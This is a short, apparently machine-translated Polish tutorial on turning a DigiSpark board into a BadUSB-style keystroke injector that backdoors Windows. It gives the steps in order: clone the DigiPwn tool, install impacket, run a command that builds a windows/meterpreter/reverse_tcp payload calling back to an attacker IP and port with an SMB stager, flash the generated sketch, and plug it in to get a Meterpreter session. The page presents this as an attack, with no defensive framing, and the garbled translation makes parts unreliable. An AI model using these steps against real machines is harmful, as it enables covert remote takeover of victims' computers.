Spisu treści:
2025 Autor: John Day | [email protected]. Ostatnio zmodyfikowany: 2025-01-13 06:58
Więc co my tutaj robimy?
DigiSpark to małe narzędzie programistyczne oparte na Arduino, które może działać jako wejście klawiatury HID. Dzisiaj manipulujemy tym urządzeniem tak, aby backdoora systemu operacyjnego Windows!
Kieszonkowe dzieci
IDE Arduino
Maszyna z systemem Windows
DigiSpark
Metasploit Framework
Python 2.7 (Uwaga: potrzebujesz Pythona „2.7”, nie wybieraj żadnej innej wersji)
pakiet
Mózg! To pomaga
Krok 1: Sklonuj repozytorium DigiPwn
Sklonuj do repozytorium DigiPwn na GitHub przez
klon git
Teraz zmień katalog na DigiPwn by
cd DigiPwn/
Krok 2: Zainstaluj Imppacket [moduły wymagane przez Pythona]
Ten moduł jest wymagany do uruchomienia serwera SMB, który jest wymagany przez bibliotekę ładunku
sudo apt-get zainstaluj python-impacket
Możesz też pobrać bibliotekę impacket i zainstalować ją stąd.
Krok 3: Wygenerujmy ładunek
Biegać
python DigiPwn.py [HOST] [PORT] [ŁADUNEK] [PLIK WYJŚCIOWY] [format]
były
python DigiPwn.py 192.168.1.2 8080 windows/meterpreter/reverse_tcp win.vbs win.vbs
Teraz zostaniesz zapytany, czy uruchomić stager i serwer SMB. Naciśnij y i naciśnij enter
Krok 4: Teraz prześlij kod do Arduino
Przed wgraniem musimy upewnić się, że płytka DigiSpark jest zainstalowana w Arduino, aby to zrobić tutaj.
następnie prześlij plik keystroke_inject.ino wygenerowany przez skrypt. Gdy skończysz, jesteś gotowy
Krok 5: Czas podłączyć dziecko
Podłącz teraz DigiSpark i poczekaj 10 sekund
BOOM Otwarta sesja miernika!